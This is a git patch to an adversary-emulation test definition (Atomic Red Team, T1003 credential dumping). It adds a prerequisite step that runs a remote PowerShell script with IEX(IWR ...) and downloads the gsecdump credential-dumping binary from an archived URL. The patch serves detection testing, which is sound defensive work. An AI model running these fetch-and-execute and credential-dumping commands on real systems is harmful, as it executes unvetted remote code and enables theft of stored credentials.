From 291346e52b8bb4c85ea568b7c459ca0f486bece8 Mon Sep 17 00:00:00 2001
From: Mr B0b <6248411+Mr-B0b@users.noreply.github.com>
Date: Sat, 7 Mar 2020 23:20:14 +0100
Subject: [PATCH] Add test 2 prereqs for T1003 that performs Credential Dumping (#861)

* Add test 2 prereqs for T1003 that performs Credential Dumping

* add import from web

Co-authored-by: Carrie Roberts
---
 atomics/T1003/T1003.yaml | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index c21dca84..2be1d1bd 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -30,15 +30,27 @@ atomic_tests:
 description: Path to the Gsecdump executable
 type: Path
 default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
+ gsecdump_url:
+ description: Path to download Gsecdump binary file
+ type: url
+ default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
+ gsecdump_bin_hash:
+ description: File hash of the Gsecdump binary file
+ type: String
+ default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
 dependency_executor_name: powershell
 dependencies:
 - description: |
- Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
+ Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 prereq_command: |
 if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 get_prereq_command: |
- Write-Host Automated installer not implemented yet
+ $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
+ IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
+ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){
+ Move-Item $binpath "#{gsecdump_exe}"
+ }
 executor:
 name: command_prompt